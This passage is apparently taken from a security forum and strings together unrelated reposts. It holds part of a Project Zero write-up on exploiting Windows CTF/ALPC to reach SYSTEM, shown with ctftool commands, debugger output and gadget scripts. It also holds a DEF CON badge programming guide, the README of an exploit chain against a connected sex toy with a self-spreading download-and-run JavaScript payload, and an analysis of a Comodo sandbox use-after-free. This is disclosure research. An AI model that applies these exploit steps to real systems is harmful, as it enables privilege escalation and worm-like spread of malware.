passed it with data about the current profile. Looking for bugs... It will come as no surprise that this complex, obscure, legacy protocol is full of memory corruption vulnerabilities. Many of the COM objects simply trust you to marshal pointers across the ALPC port, and there is minimal bounds checking or integer overflow checking. Some commands require you to own the foreground window or have other similar restrictions, but as you can lie about your thread id, you can simply claim to be that Window's owner and no proof is required. It didn’t take long to notice that the command to invoke a method on an instantiated COM stub accepts an index into a table of methods. There is absolutely no validation of this index, effectively allowing you to jump through any function pointer in the program. int __thiscall CStubITfCompartment::Invoke(CStubITfCompartment *this, unsigned int FunctionIndex, struct MsgBase **Msg) { return CStubITfCompartment::_StubTbl[FunctionIndex](this, Msg); } Here FunctionIndex is an integer we control, and Msg is the CTF_MSGBASE we sent to the server. If we try calling a nonsense function index... ctf> callstub 0 0 0x41414141 This happens in notepad... (3248.2254): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. MSCTF!CStubITfInputProcessorProfileMgr::Invoke+0xc: 00007ff9`4b669c6c 498b04c1 mov rax,qword ptr [r9+rax*8] ds:00007ffb`5577e6e8=???????????? ???? 0:000> r rax=0000000041414141 rbx=0000000000000000 rcx=0000025f170c36c0 rdx=000000d369fcf1f0 rsi=0000000080004005 rdi=000000d369fcf1f0 rip=00007ff94b669c6c rsp=000000d369fcec88 rbp=000000d369fcf2b0 r8=000000d369fcf1f0 r9=00007ff94b6ddce0 r10=00000fff296cd38c r11=0000000000011111 r12=0000025f170c3628 r13=0000025f170d80b0 r14=000000d369fcf268 r15=0000000000000000 iopl=0 nv up ei pl zr na po cy cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010247 MSCTF!CStubITfInputProcessorProfileMgr::Invoke+0xc: 00007ff9`4b669c6c 498b04c1 mov rax,qword ptr [r9+rax*8] ds:00007ffb`5577e6e8=???????????? ???? Note that ctf library catches all exceptions, so notepad doesn’t actually crash! This also means you get unlimited attempts at exploitation. This seems like a good first candidate for exploitation. Let’s find something to call... All of the major system programs and services shipping in Windows 10 use CFG, Control Flow Guard. In practice, CFG is a very weak mitigation. Ignoring the many known limitations, even the simplest Windows programs have hundreds of thousands of whitelisted indirect branch targets. Finding useful gadgets is significantly more tedious with CFG, but producing useful results is no less plausible than it was before. This bug effectively allows you to dereference an arbitrary function pointer somewhere within your address space. You can call it with two parameters, the this pointer, and a pointer to a pointer to a structure partly controlled (the ALPC PORT_MESSAGE). Not a very promising start! I decided to just call every possible index to see what happened. I was hoping for an exception that might have moved the registers and stack into something a bit more favourable. Using the Windows Subsystem for Linux, I used this bash command to keep spawning new notepads and logging the exceptions with cdb: $ while :; do cdb -xi ld -c 'g;r;u;dq@rcx;dq@rdx;kvn;q' notepad; done Then, I used ctftool to call every possible function index. This actually worked, and I found that at index 496 there is a pointer to MSCTF!CTipProxy::Reconvert, a function that Moves RDX, RCX, RDI and R8 just 200 bytes away from a buffer I control, and then jumps to a pointer I control. 0:000> dqs MSCTF!CStubIEnumTfInputProcessorProfiles::_StubTbl + 0n496*8 L1 00007ff9`4b6dec28 00007ff9`4b696440 MSCTF!CTipProxy::Reconvert I can still only jump to CFG whitelisted branch targets, but this is a much more favourable program state for exploitation. A note about ASLR... The entire base system in Windows 10 uses ASLR, but image randomization on Windows is per-boot, not per-process. This means that we can reliably guess the location of code. Unfortunately, the stack is randomized per-process. If we want to use data from the stack we need to leak a pointer. It turns out that compromising the server is trivially easy, because as part of the CTF marshalling protocol, the monitor actually tells you where its stack is located ¯\_(ツ)_/¯. Browsing what gadgets are available... While the server will just tell you where it's stack is, clients will not. This means that we either need to find an infoleak, or a write-what-where gadget so that we can move data somewhere we can predict, like the data section of an image. Once we have one of those, we can make fake objects and take over the process. I dumped all the whitelisted branch targets with dumpbin and cdb, and found some candidate gadgets. This process is mostly manual, I just use egrep to find displacement values that look relevant, then read any promising results. The only usable arbitrary write gadget I could find was part of msvcrt!_init_time, which is a whitelisted cfg indirect branch target. It’s a decrement on an arbitrary dword. 0:000> u msvcrt!_init_time+0x79 msvcrt!_init_time+0x79: 00007ff9`4b121db9 f0ff8860010000 lock dec dword ptr [rax+160h] 00007ff9`4b121dc0 48899f58010000 mov qword ptr [rdi+158h],rbx 00007ff9`4b121dc7 33c0 xor eax,eax 00007ff9`4b121dc9 488b5c2430 mov rbx,qword ptr [rsp+30h] 00007ff9`4b121dce 488b6c2438 mov rbp,qword ptr [rsp+38h] 00007ff9`4b121dd3 4883c420 add rsp,20h 00007ff9`4b121dd7 5f pop rdi 00007ff9`4b121dd8 c3 ret Trust me, I spent a lot of time looking for better options 🤣 This will work, it just means we have to call it over and over to generate the values we want! I added arithmetic and control flow to ctftool so that I can automate this. I have to keep decrementing bytes until they match the value I want, this is very laborious, but I was able to get it working. Here is a snippet of my ctftool language generating these calls. # I need the first qword to be the address of my fake object, the -0x160 is to compensate for # the displacement in the dec gadget. Then calculate (-(r1 >> n) & 0xff) to find out how many times # we need to decrement it. # # We can't read the data, so we must be confident it's all zero for this to work. # # CFG is a very weak mitigation, but it sure does make you jump through some awkward hoops. # # These loops produce the address we want 1 byte at a time, so I need eight of them. patch 0 0xa8 r0 8 -0x160 set r1 r0 shr r1 0 neg r1 r1 and r1 0xff repeat r1 callstub 0 0 496 patch 0 0xa8 r0 8 -0x15f set r1 r0 shr r1 8 neg r1 r1 sub r1 1 and r1 0xff repeat r1 callstub 0 0 496 ... Generating fake objects in memory one decrement at a time... Now that I can build fake objects, I was able to bounce around through various gadgets to setup my registers and finally return into LoadLibrary(). This means I can compromise any CTF client, even notepad! Am I the first person to pop a shell in notepad? 🤣 Making it matter... Now that I can compromise any CTF client, how do I find something useful to compromise? There is no access control in CTF, so you could connect to another user's active session and take over any application, or wait for an Administrator to login and compromise their session. However, there is a better option: If we use USER32!LockWorkstation we can switch to the privileged Winlogon desktop that is already running as SYSTEM! It's true, there really is a CTF session for the login screen... PS> ctftool.exe An interactive ctf exploration tool by @taviso. Type "help" for available commands. Most commands require a connection, see "help connect". ctf> help lock Lock the workstation, switch to Winlogon desktop. Usage: lock Unprivileged users can switch to the privileged Winlogon desktop using USER32!LockWorkstation. After executing this, a SYSTEM privileged ctfmon will spawn. Most commands require a connection, see "help connect". ctf> lock ctf> connect Winlogon sid The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon3 NtAlpcConnectPort("\BaseNamedObjects\msctf.serverWinlogon3") => 0 Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon3, Handle 00000240 ctf> scan Client 0, Tid 2716 (Flags 0000, Hwnd 00000A9C, Pid 2152, ctftool.exe) Client 1, Tid 9572 (Flags 0x1000000c, Hwnd 00002564, Pid 9484, LogonUI.exe) Client 2, Tid 9868 (Flags 0x10000008, Hwnd 0000268C, Pid 9852, TabTip.exe) The Windows logon interface is a CTF client, so we can compromise it and get SYSTEM privileges. Here is a video of the attack in action. Watch a video of an unprivileged user getting SYSTEM via CTF. You can read more notes on the exploitation process here. The "TIP" of the iceberg... The memory corruption flaws in the CTF protocol can be exploited in a default configuration, regardless of region or language settings. This doesn't even begin to scratch the surface of potential attacks for users that rely on out-of-process TIPs, Text Input Processors. If you have Chinese (Simplified, Traditional, and others), Japanese, Korean or many other[4] languages installed, then you have a language with extended capabilities. Any CTF client can select this language for another client, just having it installed is enough, it doesn't have to be enabled or in use. This allows any CTF client to read and write the text of any window, from any other session. Using ctftool we can, for example, replace the text in notepad with our own text. ctf> connect The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1 NtAlpcConnectPort("\BaseNamedObjects\msctf.serverDefault1") => 0 Connected to CTF server@\BaseNamedObjects\msctf.serverDefault1, Handle 000001E8 ctf> wait notepad.exe Found new client notepad.exe, DefaultThread now 3468 ctf> setarg 7 New Parameter Chain, Length 7 ctf> setarg 0x1 0100000001000000 ctf> setarg 0x1 0000000000000000 Dumping Marshal Parameter 1 (Base 0120F6B8, Type 0x1, Size 0x8, Offset 0x78) 000000: 00 00 00 00 00 00 00 00 ........ Marshalled Value 1, DATA ctf> setarg 0x201 0 Dumping Marshal Parameter 2 (Base 0120F6B8, Type 0x201, Size 0x8, Offset 0x80) 000000: 00 00 00 00 00 00 00 00 ........ Marshalled Value 2, INT 0000000000000000 ctf> setarg 0x201 11 Dumping Marshal Parameter 3 (Base 0120F6B8, Type 0x201, Size 0x8, Offset 0x88) 000000: 0b 00 00 00 00 00 00 00 ........ Marshalled Value 3, INT 000000000000000b ctf> setarg 0x201 16 Dumping Marshal Parameter 4 (Base 0120F6B8, Type 0x201, Size 0x8, Offset 0x90) 000000: 10 00 00 00 00 00 00 00 ........ Marshalled Value 4, INT 0000000000000010 ctf> setarg 0x25 L"TestSetRangeText" Dumping Marshal Parameter 5 (Base 0121C680, Type 0x25, Size 0x20, Offset 0x98) 000000: 54 00 65 00 73 00 74 00 53 00 65 00 74 00 52 00 T.e.s.t.S.e.t.R. 000010: 61 00 6e 00 67 00 65 00 54 00 65 00 78 00 74 00 a.n.g.e.T.e.x.t. Marshalled Value 5, DATA ctf> setarg 0x201 0x77777777 Dumping Marshal Parameter 6 (Base 0121E178, Type 0x201, Size 0x8, Offset 0xb8) 000000: 77 77 77 77 00 00 00 00 wwww.... Marshalled Value 6, INT 0000000077777777 ctf> call 0 MSG_REQUESTEDITSESSION 1 1 0 Result: 0 ctf> marshal 0 MSG_SETRANGETEXT Result: 0, use `getarg` if you want to examine data Using CTF to change and read the contents of windows. The obvious attack is an unprivileged user injecting commands into an Administrator's console session, or reading passwords as users log in. Even sandboxed AppContainer processes can perform the same attack. Another interesting attack is taking control of the UAC consent dialog, which runs as NT AUTHORITY\SYSTEM. An unprivileged standard user can cause consent.exe to spawn using the "runas" verb with ShellExecute(), then simply become SYSTEM. The UAC consent dialog is a CTF client that runs as SYSTEM. For screenshot purposes I lowered the UAC level here, but it works at any level. By default, it uses the "secure" desktop.... but there is no access control whichever level you choose ¯\_(ツ)_/¯ PS> handle.exe -nobanner -a -p "consent.exe" msctf consent.exe pid: 6844 type: ALPC Port 3D0: \BaseNamedObjects\msctf.serverWinlogon1 consent.exe pid: 6844 type: Mutant 3F0: \Sessions\1\BaseNamedObjects\MSCTF.CtfMonit orInstMutexWinlogon1 consent.exe pid: 6844 type: Event 3F4: \Sessions\1\BaseNamedObjects\MSCTF.CtfMonit orInitialized.Winlogon1S-1-5-18 consent.exe pid: 6844 type: Event 3F8: \Sessions\1\BaseNamedObjects\MSCTF.CtfDeact ivated.Winlogon1S-1-5-18 consent.exe pid: 6844 type: Event 3FC: \Sessions\1\BaseNamedObjects\MSCTF.CtfActiv ated.Winlogon1S-1-5-18 consent.exe pid: 6844 type: Mutant 450: \Sessions\1\BaseNamedObjects\MSCTF.Asm.Mute xWinlogon1 consent.exe pid: 6844 type: Mutant 454: \Sessions\1\BaseNamedObjects\MSCTF.CtfServe rMutexWinlogon1 I've implemented this attack in ctftool, follow the steps here to try it. So what does it all mean? Even without bugs, the CTF protocol allows applications to exchange input and read each other's content. However, there are a lot of protocol bugs that allow taking complete control of almost any other application. It will be interesting to see how Microsoft decides to modernize the protocol. If you want to investigate further, I’m releasing the tool I developed for this project. https://github.com/taviso/ctftool Conclusion It took a lot of effort and research to reach the point that I could understand enough of CTF to realize it’s broken. These are the kind of hidden attack surfaces where bugs last for years. It turns out it was possible to reach across sessions and violate NT security boundaries for nearly twenty years, and nobody noticed. Now that there is tooling available, it will be harder for these bugs to hide going forward. Bonus... can you pop calc in calc? In Windows 10, Calculator uses AppContainer isolation, just like Microsoft Edge. However the kernel still forces AppContainer processes to join the ctf session. ctf> scan Client 0, Tid 2880 (Flags 0x08, Hwnd 00000B40, Pid 3048, explorer.exe) Client 1, Tid 8560 (Flags 0x0c, Hwnd 00002170, Pid 8492, SearchUI.exe) Client 2, Tid 11880 (Flags 0x0c, Hwnd 00002E68, Pid 14776, Calculator.exe) Client 3, Tid 1692 (Flags 0x0c, Hwnd 0000069C, Pid 15000, MicrosoftEdge.exe) Client 4, Tid 724 (Flags 0x0c, Hwnd 00001C38, Pid 2752, MicrosoftEdgeCP.exe) This means you can compromise Calculator, and from there compromise any other CTF client.. even non AppContainer clients like explorer. On Windows 8 and earlier, compromising calc is as simple as any other CTF client. So yes, you can pop calc in calc 😃 [1] Via twitter. [2] I can’t figure out what CTF stands for, it’s not explained in any header files, documentation, resources, sdk samples, strings or symbol names. My best guess is it's from hungarian notation, i.e. CTextFramework. [3] Adding support for Windows Vista would be trivial. XP support, while possible, would be more effort. [4] This list is not exhaustive, but presumably you know if you write in a language that uses an IME. Posted by taviso at 7:01 AM Sursa: https://googleprojectzero.blogspot.com/2019/08/down-rabbit-hole.html
  18. Posted by u/FakeSquare 5 days ago Defcon 27 Badge Hacking for Beginners I'm the "NXP guy" mentioned in the badge talk, and got to meet and help a lot of yall in the Hardware Hacking village during my first (but definitely not last) Defcon. I'd been interested in going since I was a teenager in the 90s reading about it on Slashdot, and it was really awesome getting to meet so many people so excited about embedded systems. It was definitely the most fun and fascinating conference I've ever gone to in my life. If you got leveled up by a blue magic badge, that was me. I can't take any credit at all for the badge as Joe Grand did all the work. I only first saw the badge 2 days before Defcon started, so I had a lot of fun hacking it too and trying to figure out its secrets and how to make it into a chameleon badge just like everyone else. There's an updated version of the badge talk that Joe posted on his website. If you didn't make it to his session during DEFCON I highly recommend going through it, the process of sourcing the gems was insane: http://www.grandideastudio.com/wp-content/uploads/dc27_bdg_slides.pdf Full schematics and source code and more can now be found at: http://www.grandideastudio.com/defcon-27-badge/ So I told people in the hardware hacking village I'd make a post to cover all the many questions I got over the conference and walk through step by step how to program their badge for someone that has no embedded experience at all. I'll edit this for any new questions that come up and will be writing up a software guide shortly for walking through the code. There's two main NXP devices on the badge: KL27- MKL27Z64VDA4 - 48Mhz ARM Cortex M0+ microcontroller w/ 64KB flash (Datasheet and Reference Manual) NXH2261UK- Near Field Magnetic Induction (NFMI) chip for the wireless communication. Has a range on the badge of about 6 inches (15cm), but the technology can work a bit further. It's often found in high end headphones because BLE waves are disrupted by your head but these waves aren't. Also less power consumption. Overview Pinout Using the serial port: There's a serial interface which prints out helpful information and there's some "secrets" available if you have a completely leveled up badge. It'll also be really helpful if you're writing new code to hack your badge for printf debugging. Note that you cannot program the board by default over the serial port. This particular chip doesn't support that, though some of our other chips do. It of course would be possible to write a serial bootloader for it, but that's definitely not beginner level. You'll need two pieces of hardware: Header Pins Serial-to-USB converter Header Pin: You can solder on a header to the PCB footprint. Because of the quartz, the leads would need to be flat on the PCB. A Harwin M20-8770442 will fit the footprint and is what was provided at the soldering village and what you see in the photos below. You could also try creating your own header. Serial to USB Converter: Since almost no computer today comes with a serial port, a serial to USB converter dongle is needed. It'll often have four pins: GND, Power, TX, and RX. The DEFCON badge runs at 1.8V, but the chip itself is rated up to 3.6V, so a 3.3V dongle can be used *as long as you do not connect the power pin on the serial header*. You only need to connect GND, RX, and TX. In a production design you would not want an IO voltage above VCC, but for hacking purposes it'll work, and I've used it all week without an issue on multiple boards. There's a lot of options. Here's a 1.8V one if you want to be extra cautious or a 3.3V one that already comes with connectors for $8. Anything that transmits at 1.8V or 3.3V will work if you already have one, but again, don't connect the power pin. Software: You'll need to install a serial terminal program like TeraTerm or Putty. There's also a built-in terminal program in MCUXpresso IDE (see next section) on the "Terminal" tab. Plug the USB converter dongle into your computer and it should enumerate as a serial COM port. Connect the GND line on the dongle to GND on the header Connect the TX pin on the dongle to the RX pin on the header Connect the RX pin on the dongle to the TX pin on the header (it is not RX to RX as you might expect, I spent 2 whole days tearing my hair out over that during my robotics project in college) DO NOT CONNECT THE POWER PIN Should look like the following when finished Serial port converter connected 6) In your serial terminal program, connect to the COM port your dongle enumerated as 7) Find the serial port settings menu (in TeraTerm it's in Setup->Serial Port from the menu bar) , and set the baud rate to 115200. The other settings should not need to be changed (8 data bits, no parity, 1 stop bit). 😎 In the terminal, press enter. You should get a > prompt 9) In the terminal, press the '?' key on your keyboard, and hit enter, you'll see the menu. 10) Note that the keyboard key you press won't show up in the terminal, but just press Enter and then the command will be run 11) Hit Ctrl+x to exit interactive mode and turn back on the radio. 12) When not in interactive mode, the terminal will display the packets that it received from any badge you bring close to it. This is how the badge reader in the chill out room worked. Reprogramming Your Badge: Hardware: There's two pieces of hardware needed: Programmer/debugger Programming cable Program Debugger: Most any ARM Cortex M debug programmer can be used, as the KL27 chip has a ARM Cortex M0+ core. I'd recommend the LPC-Link2 as it's only $20 and can be bought directly from NXP or from most distributors (like Mouser or Digikey). Search for "OM13054". But you could also use a J-Link, PEMicro, or others if you already have an ARM programmer. Cable: The DEFCON badge has the footprint for a Tag Connect TC2050-IDC-NL-050-ALL. Because this cable is meant for manufacture programming and not day-to-day debugging, if you plan on stepping through code, you'll also want to pop off the the quartz front and get some retainer clips to keep the programmer connected to the board. If you just simply want to reprogram the board, you can just snip off the 3 long guide clips, and press the cable against the PCB while holding your hand steady for the ~5 seconds it takes to flash it each time. Alternatively if you already have a JTAG/SWD cable and have soldering skills, you can use some fine gauge wire and hack up your own converter to your board like /u/videlen did with some true hacker soldering. However as /u/int23h pointed out, because it's using Single Wire Debug (SWD) you only need to really solder 2 of the pins, SWDIO and SWDCLK. However nRESET is also recommended as it'll let you take control of the device if it's in sleep mode (which it is most of the time). Power (which is needed so the programmer knows what voltage to send the signals at) and GND you can get from the serial header. Programming pinout Software There's three pieces of software you'll need: Compiler MCUXpresso SDK for the KL27 Badge source code Compiler: Recommended Option: Latest version of MCUXpresso IDE - available for Windows, Mac, and Linux. Requires registration but it's instant. Second Option: Download older version of MCUXpresso IDE for Windows from the DEFCON media server Third Option: If you use the latest SDK, you can use ARM-GCC, IAR, or Keil tool chains as well. MCUXpresso SDK: Recommend Option: Download latest SDK version for KL27 - includes projects for MCUXpresso IDE, ARM-GCC, IAR, and Keil compilers Other option: Download the older 2.4.2 SDK version on the DEFCON server which only has MCUXpresso IDE compiler support. Badge Source: Recommended Option: Download zip off Joe Grand Website: http://www.grandideastudio.com/wp-content/uploads/dc27_bdg_source.zip Other option: Download from DEFCON media server. However the .project and .cproject files do not show up by default, so you must make sure to explicitly download them as well and put them in the main firmware folder (at the same level as the .mex file). These are the exact same files as in the zip. wget -r -np -R "index.html*" https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20badge/Firmware/ wget https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20badge/Firmware/.cproject wget https://media.defcon.org/DEF%20CON%2027/DEF%20CON%2027%20badge/Firmware/.project Getting Started with MCUXpresso IDE: 1) Open up MCUXpresso IDE. When it asks for a workspace directory to use, select (or make) a new empty directory that is in a different location than where you downloaded the firmware source. 2) Drag and drop the SDK .zip file from your file system into the MCUXpresso IDE "Installed SDKs" window. It'll pop up a dialog box asking if you're sure you want to import it into the IDE, click on OK. This is how the compiler learns about the KL27 device and the flash algorithms. 3) Drag and drop the badge firmware folder from a file explorer window into the MCUXpresso IDE "Project Explorer" window 4) In the Quickstart panel hit Build 5) In the Console tab, you should see the message that it compiled successfully 6) In the Quickstart panel hit Debug. If you're not using a LPC Link2 for programming, you'll need to hold Shift when clicking this the first time so it'll rescan for your debugger. If using the latest MCUXpresso IDE, you may see a dialog box that the launch configuration needs to be updated the first time you do this. Click on "Yes" 7) A dialog box will come up confirming your debug probe. Don't hit OK yet. 😎 Connect the TagConnect cable to the J7 header on the LPC Link2. Then connect the cable to the badge and press to make a good connection. Make sure the alignment pins match up with the alignment holes on the PCB, and that pin 1 (the red stripe) matches the photo below. You may hear the badge beep, as it's being reset. 9) Then hit OK in the dialog box to start programming. Make sure to keep the probe held there until the programming is finished - about 5 seconds. 10) You should see it program successfully and hear the board beep as it reboots. Programming Troubleshooting/Tips: If you're not using a LPC Link2, hold down the Shift key when you hit the Debug button, and it'll re-search for new probes. Also make sure your probe/settings are setup for SWD mode and not JTAG mode. If you have the programming cable not lined up with the pads, you'll see an error about wire not connected. Re-align your probe and try again. Also you must have power from the battery as the MCU needs to be turned on while programming. You can hit the GUI flash programmer at the top for a quicker download experience since it won't load the debug view. Useful if just flashing the device without wanting to step through code. Finally, some of the game state variables are stored in the non-volatile internal flash, and may not automatically get erased when reprogramming the firmware as the programmer doesn't realize that area of flash memory is being used, and so to save time, the programmer doesn't bother to erase that area. You can force a complete erase of the flash to wipe all the game variables by setting the mass erase option. Double click on the dc27_badge LinkServer Debug.launch file which contains the debug settings, and go to GUI Flash Tool->Program and set Program (mass erase first). Getting Started with ARM-GCC: To make this easier, you'll need to download the latest SDK from the NXP website first. Follow the instructions in Section 6 of the MCUXpresso SDK User Guide for how to setup the environment and test it out on Hello World. You can then use that project for copying the badge source code into. I'm sure someone can put together a Makefile for the badge specifically. See this series of blog posts on how to use the SDK (compiling/debugging) with arm-gcc in Linux. What if the badge isn't working: First thing to try is power cycling the badge by gently prying the battery out (with a butter knife or something to prevent the battery holder from coming loose) and putting it back in. A couple of things might happen: If nothing at all happens, you battery might be dead. Try replacing the battery. It's a CR2032 coin cell. If nothing at all happens still, the battery holder might be loose. Use a multimeter to measure the voltage between the outer pads (GND and VCC) on the serial header, it should read 1.8V. If it does not, check the battery holder. If you hear beeps, all 6 LEDs light up, and then 4 LEDs (2 on each side) flash in sync a few times, it means there was an issue communicating with the NFMI device. This could be due to a loose solder joint on one of the chips or the I2C pull up resistors (SCL and SDA on the pinout image). You could also do a reflow if you have the equipment, but it may not be fixable. Also could see if see any I2C communication on those SCL/SDA pins. If you hear a normal startup beep, the lights flash, and then it goes back to the startup beep, and so on, forever, something is causing the MCU to keep resetting. Could be a short or ESD damage. Check soldering. Connecting your board to a serial terminal and see how far it gets in the boot process to help narrow down the cause. Sometimes the flags don't get saved properly. A power cycle usually works, and could also try reflashing the badge. If your badge isn't responding to other badges with the NFMI, it could be one of two things: Your copper antenna (see photo at top of post) is loose/broken/missing. This happened a lot. Solder it back on. If missing, it's a Sunlord MTNF6040FS3R7JTFY01 but it's not available online anywhere at the moment. Datasheet is here, . See this reply for more details on possible alternatives. If you were previously in interactive serial port mode, you have to explicitly exit it with Ctrl+X to receive packets again. Further hacking: For basic hacking of the code, try changing your game flags to trick it to giving you a fully unlocked badge. From there, you could try to make your own chameleon badge like others have done (https://github.com/japd06/defcon27_badge and https://github.com/nkaminski/DC27-badge-CFW and https://github.com/NickEngmann/Jackp0t among others if you want ideas). Or make your own songs with the piezo. Or some ASCII art on the terminal. For more advanced hacking on the badge, PTE22 and PTE23, the TX and RX pins on the serial header, could be programmed to be ADC input pins instead. Or timer inputs or outputs for PWM or input capture. Pin Mux And with if you're good at soldering, you could even add an additional I2C device by soldering to the resistor points. I2C points Finally if you want a more flexible platform for exploring embedded development, you can pick up a FRDM-KL27Z dev kit for $20 which has the same chip as the badge. You can buy it direct or all major distributors online. The programmer and serial interface are built into the board so you only need to use a USB cable to do all the programming. The KL27 SDK also includes dozens of example programs that show how to use all the features of the chip and there's some getting started videos (mostly what I covered already in this post though). While it does not have a NFMI chip on it, it does have USB support, as well as an Arduino hardware footprint on it so it can be easily expanded with extra boards. You can find the example programs by going to "Import SDK examples" from the Quickstart panel window. Hope this helps some beginner embedded hackers, and if you have any questions let me know. Hope to see yall next year! Sursa: https://www.reddit.com/r/Defcon/comments/cpmpja/defcon_27_badge_hacking_for_beginners/
  19. Abusing Insecure WCF Endpoints for Fun and Profit - Christopher Anastasio - INFILTRATE 2019
  20. Nytro

    butthax

    butthax This repository contains code for an exploit chain targeting the Lovense Hush connected buttplug and associated software. This includes fully functional exploit code for a Nordic Semiconductor BLE stack vulnerability affecting all versions of SoftDevices s110, s120 and s130, as well as versions of the s132 SoftDevice 2.0 and under. Exploit details can be found in the slides for the associated DEF CON 27 talk, Adventures in smart buttplug penetration (testing). How to build I don't really expect anyone to actually build this, but if for some reason you do, follow these steps: Get armips (I used version 0.10.0) and have it in your PATH Install devkitARM Get the buttplug's SoftDevice from Nordic (s132_nrf52_1.0.0-3.alpha_softdevice.hex) and place it in the inputbin directory (or dump it from your own plug) Dump your buttplug's application firmware through SWD (for example with j-link command "savebin hushfw.bin, 1f000, 4B30") and place it as hushfw.bin in the inputbin directory Run build.bat - it should generate exploitfw.zip. You can then use the Nordic Toolbox app to enable DFU mode on the target buttplug using the "DFU;" serial command and then flash the custom firmware you just built through the app's DFU functionality NOTE: if anything goes wrong building this you could totally end up bricking your toy, or worse. So please be sure to 100% know what you're doing and don't blame me if it does mess up. Files fwmod: malicious firmware for the Hush firmwaremod.s: edits the firmware to (a) install hooks into the softdevice that will allow us to intercept raw incoming/outgoing BLE packets and (b) send our own raw BLE packets exploit source/main.c: C implementation of the Nordic SoftDevice BLE vulnerability exploit source/payload.c: binary payload to be sent to and run by the victim USB dongle inputbin: input binaries that i don't want to redistribute because i didn't make them and don't want to get in trouble (BYOB) js/t.js: JavaScript payload to run in the Lovense Remote app - downloads an EXE file, runs it, and then forwards the payload to everyone in the user's friend list s132_1003a_mod: modifications to the 1.0.0.3alpha version of the s132 SoftDevice (which is what the Hush ships with) which allow our modded firmware to interact with the BLE stack - must be built before fwmod scripts: various python scripts to help build this crap shellcode: a few assembly files for tiny code snippets used around the exploit chain - doesn't need to be built as they're already embedded in other places, only provided for reference flash.s: source for fwmod/exploit/source/payload.c, ie the payload that runs on the victim USB dongle - contains code to generate the HTML/JavaScript payload, flash it to the dongle for persistence, and then send it over to the app Contact You can follow me on twitter @smealum or email me at smealum@gmail.com. Disclaimer don't be a dick, please don't actually try to use any of this Sursa: https://github.com/smealum/butthax/blob/master/README.md
  21. Tuesday, August 13, 2019 Comodo Antivirus - Sandbox Race Condition Use-After-Free (CVE-2019-14694) Hello, In this blogpost I'm going to share an analysis of a recent finding in yet another Antivirus, this time in Comodo AV. After reading this awesome research by Tenable, I decided to give it a look myself and play a bit with the sandbox. I ended up finding a vulnerability by accident in the kernel-mode part of the sandbox implemented in the minifilter driver cmdguard.sys. Although the impact is just a BSOD (Blue Screen of Death), I have found the vulnerability quite interesting and worthy of a write-up. Comodo's sandbox filters file I/O allowing contained processes to read from the volume normally but redirects all writes to '\VTRoot\HarddiskVolume#\' located at the root of the volume on which Windows is installed. For each file or directory opened (IRP_MJ_CREATE) by a contained process, the preoperation callback allocates an internal structure where multiple fields are initialized. The callbacks for the minifilter's data queue, a cancel-safe IRP queue, are initialized at offset 0x140 of the structure as the disassembly below shows. In addition, the queue list head is initialized at offset 0x1C0, and the first QWORD of the same struct is set to 0xB5C0B5C0B5C0B5C. (Figure 1) Next, a stream handle context is set for the file object and a pointer to the previously discussed internal structure is stored at offset 0x28 of the context. Keep in mind that a stream handle context is unique per file object (user-mode handle). (Figure 2) The only minifilter callback which queues IRPs to the data queue is present in the IRP_MJ_DIRECTORY_CONTROL preoperation callback for the minor function IRP_MN_NOTIFY_CHANGE_DIRECTORY. Before the IRP_MJ_DIRECTORY_CONTROL checks the minor function, it first verifies whether a stream handle context is available and whether a data queue is already present within. It checks if the pointer at offset 0x28 is valid and whether the magic value 0xB5C0B5C0B5C0B5C is present. (Figure 3) : Click to Zoom Before the call to FltCbdqInsertIo, the stream handle context is retrieved and a non-paged pool allocation of size 0xE0 is made of which the pointer is stored in RDI as shown below. (Figure 4) Later on, this structure is stored inside the FilterContext array of the FLT_CALLBACK_DATA structure for this request and is passed as a context to the insert routine. (Figure 5) FltCbdqInsertIo will eventually call the InsertIoCallback (seen initialized on Figure 1). Examining this routine we see that it queues the callback data structure to the data queue and then invokes FltQueueDeferredIoWorkItem to insert a work item that will be dispatched in a system thread later on. As you can see from the disassembly below, the work item's dispatch routine (DeferredWorkItemRoutine) receives the newly allocated non-paged memory (Figure 4) as a context. (Figure 6) : Click To Zoom Here is a quick recap of what we saw until now : For every file/directory open, a data queue is initialized and stored at offset 0x140 of an internal structure. A context is allocated in which a pointer to the previous structure is stored at offset 0x28. This context is set as a stream handle context. IRP_MJ_DIRECTORY_CONTROL checks if the minor function is IRP_MN_NOTIFY_CHANGE_DIRECTORY. If that's the case, a non-paged pool allocation of size 0xE0 is made and initialized. The allocation is stored inside the FLT_CALLBACK_DATA and is passed to FltCbdqInsertIo as a context. FltCbdqInsertIo ends up calling the insert callback (InsertIoCallback) with the non-paged pool allocation as a context. The insert callback inserts the request into the queue, queues a deferred work item with the same allocation as a context. It is very simple for a sandboxed user-mode process to make the minifilter take this code path, it only needs to call the API FindFirstChangeNotificationA on an arbitrary directory. Let's carry on. So, the work item's context (non-paged pool allocation made by IRP_MJ_DIRECTORY_CONTROL for the directory change notification request) must be freed somewhere, right ? This is accomplished by IRP_MJ_CLEANUP 's preoperation routine. As you might already know, IRP_MJ_CLEANUP is sent when the last handle of a file object is closed, so the callback must perform the janitor's work at this stage. In this instance, The stream handle context is retrieved similarly to what we saw earlier. Next, the queue is disabled so no new requests are queued, and then the queue cleanup is done by "DoCleanup". (Figure 😎 As shown below this sub-routine dequeues the pended requests from the data queue, retrieves the saved context structure in FLT_CALLBACK_DATA, completes the operation, and then goes on to free the context. (Figure 9) We can trigger what we've seen until now from a contained process by : Calling FindFirstChangeNotificationA on an arbitrary directory e.g. "C:\" : Sends IRP_MJ_DIRECTORY_CONTROL and causes the delayed work item to be queued. Closing the handle : Sends IRP_MJ_CLEANUP. What can go wrong here ? The answer to that is freeing the context before the delayed work item is dispatched which would eventually receive a freed context and use it (use-after-free). In other words, we have to make the minifilter receive an IRP_MJ_CLEANUP request before the delayed work item queued in IRP_MJ_DIRECTORY_CONTROL is dispatched for execution. When trying to reproduce the vulnerability with a single thread, I noticed that the work item is always dispatched before IRP_MJ_CLEANUP is received. This makes sense in my opinion since the work item queue doesn't contain many items and dispatching a work item would take less time than all the work the subsequent call to CloseHandle does. So the idea here was to create multiple threads that infinitely call : CloseHandle(FindFirstChangeNotificationA(..)) to saturate the work item queue as much as possible and delay the dispatching of work items 